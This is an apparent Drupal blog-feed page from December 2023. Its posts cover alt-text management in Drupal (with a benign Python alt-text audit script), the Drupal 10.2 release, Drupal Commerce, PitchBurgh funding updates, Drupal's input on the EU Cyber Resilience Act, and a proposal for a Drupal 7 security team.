Dec 15 2023

Authored by: Nadiia Nykolaichuk.

We firmly believe that website accessibility is of utmost importance, which is why we are kicking off a series of articles dedicated to the elements it cannot exist without. Of course, accessibility embraces a myriad of aspects, but we decided to choose some of the most essential ones and dig a little deeper into how each of them works.

Accessibility element #1 in our collection will be alt text. Adding proper alt text to images is one of the vital accessibility tips for content editors, and the right CMS setup plays a huge role as well. In this post, we’ll discuss everything about alt text: what it is for, how it’s managed in the Drupal CMS, and how some top-notch contributed modules can enhance its management and add more options. 

Alt text: the definition and the mission

Alt text (short for “alternative text,” also known as an alt tag or description) is a text snippet that is added to an image on a web page and describes what’s in the image. It’s meant for providing a textual alternative to visual content that can be used by assistive technology and search engines. An ideal alt description is clear and concise, avoids non-essential details, uses keywords but is not overstuffed with them, and avoids redundant text like “image of” or “photo of”.

From a technical standpoint, the alternative text is contained in the alt attribute that is used as part of the <img> (image) element of a web page’s HTML code. You can always check it by right-clicking an image and choosing “Inspect.”

An example of an image alt text in the source code of a web page.

Why alternative text has a pivotal importance:

  • First and foremost, it is an accessibility requirement meant to help people with visual impairments understand what the image conveys. These users rely on screen-reading software to navigate the web, and when a screen reader encounters an image with alternative text, it reads it aloud. If it’s not provided, a screen reader will just read out the file name or a default message like "Image" or "Graphic." 
  • Alternative text is displayed in place of an image that wasn’t able to load. This comes in handy with slower internet connections. It is important both from the standpoint of web accessibility and overall user experience. 
  • We must also mention the positive impact of alt text on SEO. It allows search engines to better crawl websites, categorize their own collections of images, and rank websites higher in image search results, helping their teams drive more organic traffic.

Alt text in Drupal: all you might need to know

Drupal is a great illustration of how a CMS can be the ideal platform for content editing teams when it comes to smooth alternative text management. It must be noted that Drupal made significant improvements in terms of accessibility and compliance with web standards, including proper handling of alt descriptions. 

There are several ways in Drupal to add images to web pages. Let’s take a closer look at how alternative text is managed through each of them, how the modern Drupal functionalities help, and what are some additional ways to enhance the process even further.

Adding alt text to an image field

Whenever you add an image via a field on the content editing form, you need to fill out its “Alternative text.” Starting with the Drupal 8.0 release, it’s impossible to skip this step. At that point, alt text became required for image fields out of the box as part of overall accessibility improvements in Drupal. This eliminates the risk of human error and makes sure this important accessibility element never gets overlooked.

Adding required alt text to an image field in Drupal.

Under the hood, image fields in all content types or other entity types now have the “Enable alt field” and “Alt field required” boxes selected by default. These settings can be found in Structure > [Your entity type] > Manage fields. As you click to edit an image field and scroll to the bottom of the page, you’ll see the selected checkboxes. At first, when alt text became required, this only worked for the built-in entity types, so it’s very useful to check these settings for all your image fields and make sure all the right checkboxes are enabled.

The settings for alt text in a Drupal image field.

Adding alt text in CKEditor

You can also add images to your content inline in the WYSIWYG editor. The interface for managing alternative text became significantly different in the new version of the text editor — CKEditor 5 (you might also want to check out an article that compares CKEditor 5 vs. CKEditor 4 for the key content editing features). So here is how alt text management looks in each version:

  • CKEditor 4

Adding alt text. As you upload an image from your computer, you see a modal dialog where you fill out the “Alternative text” field. As you hover your mouse over the field, it’ll show a “Please fill out this field” tooltip. Once you’ve added the alt description, click “Save.” 

The dialog box for adding alt text to an image in CKEditor 4.

Is alt text required? If you try to save an image without it, you’ll see an error message in the dialog box saying that alternative text is required, and that only in rare cases should this field be left empty. It will also give you a hint to create empty alternative text by entering two double quotes without any content. That’s the current workflow in CKEditor 4. 

An error message about the required alt text in CKEditor 4.

Editing alt text. If you need to change the alternative text afterwards, click on the image and then on the “Image” button on the CKEditor toolbar to see this dialog box again.

Editing the alt text of an image in CKEditor 4.

  • CKEditor 5

Adding alt text. When uploading an image from your computer, you see a balloon panel called “Text alternative” with a green checkmark and a red cross mark. Type your alt text and click the green checkmark to add it, or click the red cross mark to cancel. If an image is purely decorative, it’s not necessary to add alternative text to it, so you can toggle the “Decorative image” option on.

Adding alt text to an image via the balloon panel in CKEditor 5.

Is alt text required? If you skip adding it when saving an image that’s not marked as decorative, CKEditor 5 will keep showing an “Add missing alternative text” warning in the corner of the image.

The “Add missing alternative text” warning in CKEditor 5.

Editing alt text. If you need to change the previously added alt text, click on the image and its dedicated toolbar will appear right above it. Find the “Change image alternative text” icon on it and you’ll be able to make your changes.

Editing alt text via the dedicated toolbar for images in CKEditor 5.

Note on the difference between alt text and image captions

CKEditor 5’s dedicated toolbar for images also includes the option to add image captions. A caption is a brief text accompanying an image that provides additional context, explanation, or commentary about the image. Captions are visible to users but, unlike alternative text, captions are not automatically read by screen readers. This means they cannot be a replacement for alt text, so it’s a good idea to use both.

Adding an image caption in CKEditor 5.

Adding alt text to images in Media Library

A perfect way to store your images for further reuse is Drupal’s Media Library that became part of the Drupal core in its 8.6 release. Images are stored in the Media Library as media entities with a Media image field type. The alt settings such as “Enable alt field” and “Alt field required” can be found in Structure > Media types > Image > Manage fields > Edit. Out of the box, alt is required for media entities.

So as you go to Content > Media > Add media > Image, and upload an image to the Media Library, you must fill out the “Alternative text” field. 

Adding required alt text while uploading an image to the Media Library.

Next, whenever you want to embed images in CKEditor from the Media Library via the Media Library button on the CKEditor toolbar, you’ll no longer need to add an alt description. If you need to override the alt, you can:

Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 4.
  • Click on the image and then click the “Override media image alternative text” icon on the dedicated toolbar (for CKEditor 5)
Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 5.

Contributed Drupal modules that enhance the alt text management

In some cases, you might want to rely on some additional tools to make sure all your website’s images have proper alternative descriptions. This can be especially relevant for content-heavy websites, for websites with user-generated content, for websites that are undergoing accessibility optimization, and so on. Here are some examples of contributed Drupal modules that might help you generate alt descriptions automatically, check where they are missing, and more.

Automatic Alternative Text

Let’s start with a module for automatic alt text generation in Drupal. The Automatic Alternative Text module generates alt text for images with the help of Microsoft Azure Cognitive Services API or Alttext.ai. You’ll be able to select one of those automatic image description engines in the module’s settings. The module can create descriptions in complete English sentences, show the percentage of confidence about the correct description, intelligently generate image thumbnails, and more. There is also a submodule that automatically translates the generated text into languages other than English. 

The settings for the Automatic Alternative Text module.
Automatic alt generation by the Automatic Alternative Text module.

Decorative Image Widget

The Decorative Image Widget adds a “Decorative” checkbox that a user must check if they want to leave the alternative text field empty. If an image is marked as decorative, it will be hidden from screen readers.

A “Decorative” checkbox for images provided by the Decorative Image Widget module.

This functionality works when the alt field is set to ‘not required’ in the image field settings. The “Decorative” checkbox can be easily added or removed in an image field’s widget settings provided by the module. 

Enabling/disabling the “Decorative” checkbox for images.

Editoria11y Accessibility Checker

The Editoria11y Accessibility Checker module automatically scans your website for accessibility issues, including all kinds of issues with alternative text. Among them are:

  • alternative text is missing
  • it’s too long
  • a filename is used as alt
  • there are images in links with alt text that describes the image itself rather than the link destination
  • redundant words like “image of” or “photo of” are used in the alt

An example of redundancy in alt text discovered by the Editoria11y Accessibility Checker module.
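
To make the checks listed above concrete, here is an added example (not code from Editoria11y or from this article's author) that audits an HTML fragment for missing alt attributes, overly long alt text, filenames used as alt, and redundant “image of” / “photo of” wording. The 150-character limit, the finding labels, and the sample markup are assumptions made for the illustration; the linked-image check is left out because judging whether alt text describes the link destination needs a human reviewer.

```python
import posixpath
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed threshold: the article only says alt text can be "too long".
MAX_ALT_LENGTH = 150
# The two redundant phrases named in the article.
REDUNDANT_WORDS = re.compile(r"\b(image|photo) of\b", re.IGNORECASE)
# Alt text that is a single token ending in a common image extension.
IMAGE_FILENAME = re.compile(r"^\S+\.(jpe?g|png|gif|webp|svg|avif)$", re.IGNORECASE)


class AltTextAuditor(HTMLParser):
    """Collects (src, issue) pairs for every <img> that fails a check."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Self-closing <img ... /> tags also arrive here via the base class.
        if tag != "img":
            return
        attributes = dict(attrs)
        src = attributes.get("src") or ""

        # No alt attribute at all: a screen reader falls back to the file name.
        if "alt" not in attributes:
            self.findings.append((src, "missing"))
            return

        # An empty alt marks the image as decorative, which is valid.
        alt = (attributes["alt"] or "").strip()
        if not alt:
            return

        basename = posixpath.basename(urlsplit(src).path)
        if IMAGE_FILENAME.match(alt) or alt.lower() == basename.lower():
            self.findings.append((src, "filename-as-alt"))
        if REDUNDANT_WORDS.search(alt):
            self.findings.append((src, "redundant-words"))
        if len(alt) > MAX_ALT_LENGTH:
            self.findings.append((src, "too-long"))


def audit_alt_text(html):
    """Return a list of (src, issue) tuples in document order."""
    auditor = AltTextAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample markup, one image per case.
LONG_ALT = "Bar chart " + "showing yet another detail " * 8
SAMPLE_HTML = f"""
<article>
  <img src="/files/hero.jpg" alt="Volunteers planting trees in a city park">
  <img src="/files/divider.png" alt="">
  <img src="/files/team.jpg">
  <img src="/files/IMG_2041.jpg" alt="IMG_2041.jpg">
  <img src="/files/bike.jpg" alt="Photo of a red bicycle">
  <img src="/files/chart.png" alt="{LONG_ALT}" />
</article>
"""

if __name__ == "__main__":
    for src, issue in audit_alt_text(SAMPLE_HTML):
        print(f"{issue:16} {src}")
```
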

Final thoughts

Providing alt text for images is an essential piece of the puzzle that helps your Drupal website be genuinely accessible and compliant with the standards. Ensuring accessibility is a complex task, so whenever you need professional help with it, you are welcome to contact our experienced Drupal experts.

Dec 15 2023

New in Drupal 10.2

The second feature release of Drupal 10 improves content modeling, block management, menu and taxonomy organization, and permission administration. New options to sanitize file names make it possible to clean up the names of uploaded files, and media item revisions now have a dedicated user interface.

Easier content management

10.2 improves the user experience for managing several types of content:

  • Field types for new fields are visually listed instead of a simple select list. Settings for fields are now all included on one form.
  • Menu items and taxonomy terms have a dedicated option to add a child item, which makes item placement easier.
  • Media items now have a dedicated user interface to review and manage older revisions.
  • CKEditor's language selector can now be configured to only show languages supported on the site.

More flexible block placement

A user interface has been added to show or hide each block based on the HTTP response status, so that specific blocks can be added or removed when the page is not found (404) or access is denied (403).

New built-in file name sanitization options

The functionality of one of the most popular contributed modules is now included in core! Replace whitespace in file names, transliterate text, convert to lowercase, and more.

Faster permission management

The permissions page now comes with a filter on the top to make it easy to find the permission you planned to adjust.

Performance improvements

Drupal 10.2 includes numerous performance improvements for content rendering and HTTP responses, as well as improved caching APIs.

Works on the latest PHP

PHP 8.3 was released three weeks ago, and Drupal 10.2 is already compatible with it.

Modern language feature: PHP attributes

Drupal core has started adopting PHP attributes, a modern PHP language feature, to provide better developer experience for plugin annotations. Contributed and custom code can begin adopting this improved API for their plugins, and Block and Action plugins can all be converted to the new API.

Built-in project news updates

To help keep you up to date with project news, the Announcements Feed module became stable and is now installed by default with the standard profile.

Help topics now in Help module

The experimental Help topics module is now marked as deprecated and all functionality has been integrated into the core Help module.

Developer experience improvements

Drupal 10.2 comes with a number of developer experience improvements:

  • A PerformanceTestBase was added to support automated testing of performance metrics with support to send OpenTelemetry traces to an open telemetry endpoint.
  • A new DeprecationHelper::backwardsCompatibleCall() method is available that helps write Drupal extensions that are compatible with multiple major versions at once.
  • PHP Fibers support was added to BigPipe and the Renderer, which allows Drupal to potentially run different code while it's waiting for an asynchronous operation to return.
  • Configuration validation was expanded to better support strict testing and make configuration form validation easier to implement.
  • Symfony's autowiring support was adopted for services, based on PHP 8 attributes, making service creation easier.
  • The HTML utility classes and filter system were updated to produce HTML5 syntax instead of XHTML.

Core team updates

Drupal is built by an open source community of collaborators across geographies and organizations. Maintainers assess the work of the community and decide when it's ready to commit to Drupal core. After a period as a provisional committer, Dave Long (at Full Fat Things) was promoted to a full release manager. Kristiaan Van den Eynde (at Factorial) and Adam Bramley (at PreviousNext) have also become core subsystem maintainers. Thanks for stepping up!

Want to get involved?

If you are looking to make the leap from Drupal user to Drupal contributor, or you want to share resources with your team as part of their professional development, there are many opportunities to deepen your Drupal skill set and give back to the community. Check out the Drupal contributor guide, or join us at DrupalCon Portland and attend sessions, network, and enjoy mentorship for your first contributions.

Dec 15 2023

Drupal Commerce is a user-friendly system developed from tens of thousands of modules. It allows you to build a customized e-commerce store that meets all customer requirements. The framework source code is available to each customer, further simplifying use. 
Drupal 7 software was used to create Drupal Commerce. The developers have added essential features, including product management, a convenient shopping cart, fast checkout, and fulfillment. Also, this commerce platform has a built-in content management system, which some of the world's famous companies use. Let's explore the capabilities with our Drupal Commerce tutorial designed for beginners.

How does Drupal Commerce help your business?

A significant difference between Drupal and other e-commerce platforms is the use of open-source software. Unlike Drupal Commerce, standard software does not have a separate framework. Besides the basic functionality known to frequent users, you can also integrate, improve, and extend it. Additionally, other tools can be tested during the further development of the Internet platform. Consider the most popular Drupal Commerce features that can help your business below.

Build an online store using the constructor

As mentioned above, the Drupal 7 management system was the basis for building Drupal Commerce. This helpful feature opens up many opportunities for all users. You can design, improve, develop, and constantly change your online store. 
You have the option to change and customize various features regularly, depending on your preferences. The platform values its customers by offering multilingual functionality and strives to create new user-friendly tools that will meet the specific needs of each user. In addition, your online store on Drupal Commerce has good performance with a large transaction volume and high traffic.

Add products and manage orders easily

Drupal Commerce systems are multi-tasking tools for performing various actions on your online store platform. You can quickly add new products, edit product descriptions, create large catalogs of existing products, and customize displays and attributes. The types of products sold are not limited. 
Thus, you can sell courses, downloadable information products, subscription services, or other physical goods. E-commerce with Drupal users can independently set and change pricing rules, including regular promotions, discounts, and additional coupons. 

Fast checkout process

An easy-to-use and functional shopping cart is essential when placing an order for any customer. Drupal Commerce provides many handy tools to change the status of your purchases, a wide range of shipping methods, and other additional modules for adding statuses.
A simple checkout form also increases the likelihood of a customer purchasing from an online store. They see only the most essential points of the form, and you can regularly change and improve this page. E-commerce with Drupal offers a convenient process for paying for products and calculating prices and taxes. Moreover, it supports single-page and multi-page checkout and includes VAT for worldwide shipping.

Payments and integrations

Drupal Commerce allows the integration of many payment systems, including credit cards, for the ultimate customer experience. You can access free downloads for the most popular payment systems, such as PayPal or Authorize.Net.
Drupal Commerce users can also integrate other additional tools into their online store. The most common options are modules for shipping services, marketing, reporting, payment processing, analytics, and others. 
Thanks to these modules, you can integrate well-known and valuable tools such as Xero software, Amazon Pay, Google Analytics, and MailChimp. Customers can connect their accounts to social networking sites like Twitter, Facebook, and Pinterest.

Customer Service

Paid platforms that do not provide access to the source code have a large support service that promptly provides the services the client needs. It is justified by the existence of a subscription and regular payment for using the software. 
However, Drupal Commerce offers user-friendly documentation guides for all employees involved in the website's operation. Your customers can also use the Q&A forum for quick feedback and communication.

Is Drupal good for small E-commerce businesses?

An online store with Drupal Commerce is a unique option that will stand out from the competition with its uniqueness and user experience. It is great for small businesses. 
First, you create a small store and sell a few niche products. Subsequently, when your small business expands, you choose Drupal, which allows you to improve the website without having to do it all over again. It will be an excellent investment in the future of your business, as will the purchase of a more powerful machine that will last for many years.

Why should I build an E-commerce website with Drupal?

The status of online stores has grown significantly over the past few years. At first glance, this has led to a decrease in income for small and medium-sized business owners. A PNAS survey showed that more than 40% of the 5,500 companies in the small business network were forced to close or suspend their work. 
On the other hand, the Internet has saved many businesses from total bankruptcy and allowed entrepreneurs to continue their sales online. After 2020, online stores have increased their income several times, and this area continues to develop daily. In the next 5 years, experts predict an increase in earnings among brands and companies with platforms for selling goods or services. 
Clients appreciate well-designed websites with modern interfaces that make the user experience even more convenient. They are willing to spend much money to get a quality product. Therefore, an online store that is available on multiple devices is a great investment in the future of your business.

Checklist for creating a Drupal eCommerce Store

This article is not a detailed guide to launching an online store because, in this case, it would be very long. In addition, each client has their vision of the future online store so all customizable features will differ, depending on their preferences. Despite this, we have a small checklist with general information for beginners who want to do the basic settings themselves.
There are several different ways to create an online store with Drupal. To start an introduction to Drupal Commerce, you need to do the following:

  • First, all business owners must choose the right web hosting provider.
  • Choose a web hosting company and install Drupal.
  • Select the "quick start" route and complete the installation manually to speed up the process.
  • After starting the building, you should enter key data such as country of residence, username, password, and site name.
  • Then log in and study the user interface in more detail.
  • Browse the directory, select the theme you like, then install it.
  • Install the Drupal Commerce module.
  • Add a few more submodules: cart, order, checkout, price, payment, product, and store. 
  • Select the default store and one or more payment options. 
  • Install commercial delivery modules, which you should enable and configure manually.

After completing all the steps, you can start creating products by adding additional information:

  • product stock-keeping unit (SKU)
  • product images
  • title of each product
  • status (active or disabled)
  • product price

All of the above actions are the basis for a quick site start. In addition, creating an online store with Drupal Commerce is quite complex and requires additional training from the website owner. Users without programming experience may experience difficulties at some stages. What's more, Drupal has quite a few default tools, so you may need a Drupal developer's help to get the best possible platform.

Best Drupal E-Commerce Websites

Thousands of different websites worldwide have already been launched with Drupal Commerce. Let's look at the most famed examples:

Artellite

Artellite is a project for artists and gallery owners that allows them to promote their work to a large market, increase awareness and increase art sales. The Artellite project tries to maintain the individuality of each artist and present them to a broad audience. The Drupal framework is responsible for all essential operations on the website, including customer service and the transmission of up-to-date information. The online store owners are in total control of it and are engaged in promotion with the help of additional advertising.

Cartier

Cartier is a famous and elite French brand specializing in luxury accessories, watches, and other jewelry. The owners decided to create their online store with Drupal Commerce, paying particular attention to sophisticated design. The website has convenient functionality for placing a large number of products, as well as a simple checkout process. 

Verizon

Verizon is engaged in the marketing and promotion of electronic devices. They complete developing a new product, make a detailed presentation, and prepare to launch it on the market. The website had to emphasize the uniqueness of each product's identity and ensure that copyrights were preserved. Drupal Commerce CMS was the perfect solution to raise brand standards and ensure complete use security. In the final versions of the Internet platform, redesigned templates were used, which reduced the time to create the following product.

Is Drupal Commerce the right choice for you?

Choosing the right e-commerce platform is essential in setting up your online store, so you should carefully consider what is best for your business. It is critical to evaluate whether the software can meet all your requirements for the future of the website. Drupal Commerce gives you total control over your online store and allows you to track all transactions, and is scalable. It offers a wide range of customizations that will allow you to create a unique online store that highlights the quality of your product.
An online store is successful when people can easily find and order products. Drupal will be a great decision since it offers all the tools necessary to promote your products, such as SEO product optimization and convenient content addition. Additionally, your customers will appreciate the quick and secure checkout process since it will take just a few minutes. Build a successful online shop with the help of the Drupal commerce expert!

Dec 14 2023

Over the past several months, much of the focus within the Drupal community has concerned the imperative of Drupal migration. Between the Nov. 1, 2023 end of life for Drupal 9, and the announcement at DrupalCon last Spring that Jan. 5, 2025 was the final, final end-of-life date for Drupal 7, there has been a steady stream of messaging concerning the Why, the When, and the How of upgrading to Drupal 10.

It’s all true, but lost in all of the "have-to's" concerning transitioning to this best-ever version of Drupal, it’s easy to lose sight of the incredible opportunity inherent in a Drupal migration.

Migration provides a prime opportunity to think strategically about your site and how the architecture, design, and user experience can be better aligned with current objectives and branding.

Redefining Your Digital Presence

More so than ever before, web experiences represent a defining digital presence. The stakes for getting it right are high. What proved to be the right approach a few years ago might be inching toward becoming out of sync with user expectations.

Keep in mind, users form rapid-fire impressions about your organization and your website the second they land on a page:

  • Am I going to engage with this site?
  • Does it contain the information that I need?
  • Should I keep scrolling?
  • Do I want to click on this link?
  • Is this interface going to be easy or trip me up into some frustrating sort of loop?
  • Should I just order now?
  • Do I want more information?
  • Where else can I click that looks interesting?

Expertise Plus Empathy

Getting into alignment with user expectations calls for a deep level of inquiry along with a complex mix of empathy for users, elimination of assumptions, and user journey mapping. At Promet Source, it’s what we call Human Centered Design, and it serves as the foundation for user experience design that optimizes first impressions, maintains engagement, and drives organizational goals.

Fact is, a depth and breadth of effort and expertise factors into the creation of engaging web experiences that require minimal effort on the part of the user. Great UX is a multi-layered process, which incorporates the following objectives.

Convey Your Brand Story with Intention

Determine what it is that sets your organization apart, and ensure that your messaging, tone, and brand guidelines seamlessly align. Empathy for the fact that visitors to your site are bombarded with more messaging every day than they can ever hope to absorb will strengthen your resolve to create refreshing web experiences that offer a break from the clutter.

Even if—especially if—the subject matter is complex, focus on connecting the content to the distinct needs of your audience. 

Establish and Adhere to Consistent Standards

Clearly understood guidelines for brand colors, fonts, and all stylistic considerations, and how they are to be used across your site, drive a consistent user experience with clear expectations. Consistency provides a mental model for similar patterns, which facilitates navigation.  

Monitor Site Performance

Sites that respond efficiently and pages that load rapidly are a significant factor in a positive user experience. Expectations are high and patience is low in the current digital environment. In fact, a slow-loading website is a source of lost business. Visitors tend to stop engaging with a site if images take too long to load.

Build Information Architecture Around User Journeys

Too often, the information architecture of a site is based loosely on an internal organization chart, or what seems to make sense to the development team, or simply what appears to be standard practice. There are multiple approaches, but a deeper dive into user preferences and what makes the most sense to them is guaranteed to produce valuable insights.

Optimize for Mobile

Recent studies reveal that mobile devices account for more than half of all web traffic worldwide, and the upward trend is continuing. Mobile optimized websites, however, are lagging far behind. Mobile optimization is no longer a nice-to-have. It’s an urgent business imperative. 

Ensure Web Accessibility Compliance

Whether or not your site is legally required to do so, adherence to web accessibility guidelines is simply the right thing to do. Recent CDC reports indicate that fully 25 percent of the population has a disability of some sort. More so than ever before, online experiences represent an essential link to the outside world. Creating a site that works for people with disabilities also means that it works better for everyone, at every ability level.

When online experiences consistently spark a sense of "Why can’t our site do that?" or "Why doesn’t our site look more like this?" it’s time to take action. Your site can step up and serve as a strategic driver in an environment in which your web presence is an increasingly defining factor for your organization, your brand, and your values.

Shepherding the transformation of websites from a source of frustration, or simply a functional presence, to an intentional experience that ignites new digital possibilities is what we do here at Promet Source. Check out our recent work!

Dec 14 2023
Dec 14

The year is coming to a close and activity is already ramping down as we approach the Christmas festivities, so this month my PitchBurgh update will cover November and December.

But, before I jump into those updates, and as we are reaching important milestones and PitchBurgh is proving its value to Drupal and the community, let me highlight the importance of the companies that have made PitchBurgh possible with their funding, without whom none of this would have been possible. Those companies are:

As I mentioned, PitchBurgh projects are crossing some important milestones: some are reaching their midpoint, and some are even getting to the end of the projects themselves. Let’s cover some important updates from the past weeks:

Access Policy (Kristiaan Van den Eynde / Factorial)

Original goal: Convert the Flexible Permissions module into core code. This will allow for any access policy to be translated into a set of permissions so that access checks can run

Kristiaan’s work on Access Policy API got merged https://www.drupal.org/project/drupal/issues/3376843

This was a relatively complex project, not just because of the technical side, but also because of what it implied in terms of communication and coordination with the different people involved, and the fact that it needed approval from the core team to get this work committed into Core.

The big concern with this PitchBurgh project, as well as the JSON API one, was preventing the work from getting stuck waiting for approvals and merges for months, with the investment and all the work done and sitting there for those long months.

So, seeing this project be the first to cross the line and get merged into core is not just a relief, but proof that we can get complex things done as a community. It just takes a little bit of organization and communication between all parties involved; in this case, the Drupal Association was the one ensuring that this communication and these updates were happening often.

This project was finally committed on 17 November 2023 and will be in Drupal 10.3. You can watch a video/demo of the project here. We are now working to ensure that Drupal core itself also implements the new API by the time 10.3 is released.

Decoupled Layout Builder (PreviousNext)

Original goal: By rewriting [Layout Builder] using React. We’ll design an API that describes the future state of how a Decoupled Layout Builder could work, dramatically enhancing the content editor experience and in turn, bringing Drupal into the modern era of Web UX

Decoupled LB reached project mid point, so right now the work is being reviewed before the funds get released for this part of the project.

You can read all the updates and the rest of the information of the project on their Drupal.org issue:  https://www.drupal.org/project/drupal/issues/3375422  

You can also read the project wrap up here.

Drupal API (Brian Perry / Pantheon)

Original goal: [...] combine the best of existing Drupal API clients into a set of utilities that can both address common use cases with little configuration, and also be extended to support the needs of a diverse JavaScript ecosystem

It has been an eventful month for the Drupal API Client. 

Reaching a big milestone for the project, we’ve published a 0.1.0 release on npm which represents our Vertical Slice POC. Now that we have a small sample of the client out in the real world, we’ve created an issue for soliciting feedback from the community. Any feedback small or large would be extremely helpful for the project. We’ve also been spreading the word through an ‘Update on the Drupal API Client’ blog post and a session at New England Drupal Camp.

We are also happy to announce that coby.sher and pratik_kamble have joined the project as maintainers. They both played a critical role in making our POC a reality and we’re excited to have their leadership going forward.

As we gather feedback, we’ll continue work on the JSON:API Client 1.0 release meta issue. We could still use contributors. If you’d like to participate, join us in the #api-client channel in Drupal Slack.

Gutenberg in Drupal (Frontkom)

Original goal: Streamline the implementation of core Gutenberg library in Drupal Gutenberg to allow more frequent and easy updates. Improve Integration with Drupal

The Gutenberg project is progressing well. After the different conversations and alignments with the team in Automattic, there is a date for the workshop and a provisional agenda. Here is a sneak peek at said agenda:

  • In depth go-through of how we built Drupal Gutenberg
  • The WordPress build scripts
  • Handling permissions within Gutenberg
  • Short term structured data with JSON field
  • Possible long term structured Gutenberg
  • Gutenberg for single field editing
  • Collaborative editing

Mentor the Mentor

The first-time contributor workshop is scripted, templated, and ready for another round of testing. As new initiatives arise, they have been added to the template in the Drupal Initiatives section.

AmyJune has recruited a mentor to deliver the 2-hour training version at Florida DrupalCamp in February. They will test the script for timing and determine how much room should be set aside for demos.

In the last Event Organizer's Working Group Slack meetings, several camps expressed interest in using the workshop slides during their contribution events. The goal is to have documentation that explains how to tailor the slides for a specific event.

PitchBurgh so far in numbers

Across each of our projects we've paid out a total of 38,037.75 for milestones achieved, with 2 projects already finished, one that has crossed midpoint, and the rest advancing at a good pace.

Dec 13 2023
Dec 13

Michael E. Meyers joined Tag1 Consulting as Managing Director in 2017 after a decade of working with the team on many projects.

Prior to joining Tag1, Michael was VP of Developer Relations at Acquia, responsible for developer marketing & events, developer relations, and helped launch the developer products group. Michael co-founded & was CTO of NowPublic.com, the first venture-backed Drupal based startup that pioneered citizen journalism. With the help of Tag1, he grew NowPublic into a top 500 website. As CTO of The Clarity Digital Group, which acquired NowPublic, Michael and the Tag1 team rebuilt Examiner.com, the first Drupal-based top 100 Internet site, and the leading contributor to Drupal 7.

Michael has made major contributions to and helped establish Drupal as one of the most successful open source platforms; he’s an advisor to the Drupal Association board and several startup companies.

Dec 12 2023
Dec 12

This post is a follow up on the collaboration between Drupal and other FOSS projects in response to the proposed CRA legislation in the EU. You can read our original joint letter here.

The Drupal Association has continued to participate in weekly calls with other open source project leaders hosted by Open Forum Europe to discuss the proposed Cyber Resilience Act (CRA) in the EU. 

The EU legislators are now reconciling several different draft versions of the regulation, and incorporating stakeholder recommendations into a new draft to be advanced through the legislative process.

For the past several months multiple constituent groups within the EU have shared draft versions of the text, soliciting feedback from a variety of stakeholders in government, industry, and the open source community. 

The Open Forum Europe group reviewed several of those draft pieces being reconciled by legislators and offered detailed input and recommendations. One of the major goals was to ensure that the obligations of the CRA don't fall as an undue burden on individuals, non-profits, non-commercial entities, etc., and to forestall unintended consequences that might curtail corporate participation in open source projects. 

The Drupal Association together with the other projects represented in this process strongly believes that Free and Open Source Software is more secure software, and wanted to ensure that this legislation would not stifle the growth of the FOSS movement.

Some of the many areas we focused our recommendations on were: 

Criteria for obligation under the regulation

  • Preventing redundant obligations on open source software caused by use across multiple entities, and ensuring that appropriate obligations for larger entities are not unfairly enforced on smaller ones. 
  • Avoiding tying obligations to the rate of the release cycle which could create a chilling effect on innovation. 
  • Further clarifying that individual contributors as natural persons do not invoke regulatory obligations by participating in open source projects.
  • Encouraging a process that will allow alignment of obligations internationally, so that it will be easier for global communities to meet all their regulatory obligations.

Defining commerciality

  • Improving the text's definition of 'commerciality' - to help ensure that open source projects and the non-profit foundations that support them are not unintentionally punished for the maturity of their development process or the effectiveness of their fundraising activities. 

Risk assessment 

  • Portions of the regulation depend on the concept of risk assessment and the evaluation of security issues as 'low' or 'high' risk, 'known vulnerabilities', 'exploitability,' etc. We noted that these definitions must be carefully considered, transparent, standardized, and have room to be refined post-enactment. 
  • We also raised examples of why the method of remediation of known vulnerabilities might vary depending on each project’s approach, suggesting that this should not be too rigidly defined. 

Open Source Stewardship

  • The regulation introduces the concept of an Open Source Steward, a legal entity that can be said to hold responsibility and accountability for an open source project.
  • This creates a category for obligations separate from those of 'software manufacturers' with a level of flexibility appropriate for open source.
  • However, we noted some potential pitfalls in discrepancies between the definition of stewardship and the authority those steward organizations might have over their projects (see for example, collaborative/decentralized projects).

Collaborative/Decentralized Projects

  • Most regulatory language assumes a central entity with responsibility and accountability. Open source projects are often collaborative and decentralized. We provided several recommendations for defining 'collaborative' projects and flagged some concerns with use of the term 'decentralized' in their regulatory definition. 
  • The primary goal of our recommendations was to avoid inducing obligations (or the risk of fines) on entities that do not necessarily have formal legal relationships with each other nor formal 'ownership' of the software projects they are participating in. 

… and many more recommendations, as well. 

What comes next?

When the draft versions have been reconciled by the EU legislature and the new text is publicly available, we'll share it with the community. The legislative process will then move from the main body to the standards and implementation details created by the act. 

Dec 12 2023
Dec 12

Screenshot of a drupal.org release settings page. Contains a warning box with the text

The Drupal Security Team has announced in PSA-2023-06-07 that unsupported Drupal 7 modules/themes cannot be supported again. I'm proposing to create a D7Security team on Github that can provide security fixes for those unsupported modules. A small update module can then notify Drupal 7 site owners when new security releases are available on Github.

Background

A significant number of Drupal 7 sites are still operational. Some of these are scheduled for an upgrade to the more recent Drupal 10 platform, yet it is expected that a considerable number will continue to use Drupal 7 beyond its official support end date on January 5, 2025.

Those sites often include hundreds of Drupal 7 contributed projects from drupal.org. While some modules are maintained by the site owners in collaboration with the Drupal community, for many others, there's reliance on other maintainers for critical updates such as security and PHP compatibility.

Proactive Maintenance Approach

When a module in use cannot be supported by the original maintainers, the strategy is to assume the role of maintainers to extend security support. This is a practical decision: maintaining the code internally is essential for site security, so sharing these updates with the community as official releases is beneficial. This shared responsibility model is very common in the Drupal community.

Blocked on unsupported projects

While taking on the role of maintainers has been effective previously, there are now obstacles in continuing this on drupal.org. The Drupal Security Team is inclined to discontinue support for Drupal 7 projects. As a result, once a Drupal 7 project loses support, the policy is now to not mark it as supported again.

I have a lot of empathy for the Drupal Security Team: many of the members don't run Drupal 7 sites anymore and it can be a hassle to track down Drupal 7 module maintainers when preparing security releases. That's why they want to phase out Drupal 7 support where possible. However, there's potential to reallocate the tasks related to Drupal 7 security to a group specifically interested in maintaining these older versions.

Establishing an unofficial D7Security team on Github

In order to unburden the Drupal Security Team and the Drupal Infrastructure team I think it would be best to establish an unofficial Drupal 7 security team (let's call it D7Security team) on Github. I will describe later how we can communicate security releases from Github through the standard Drupal 7 update notification system.

The D7Security organization on Github would be completely independent of the Drupal Security Team with these benefits:

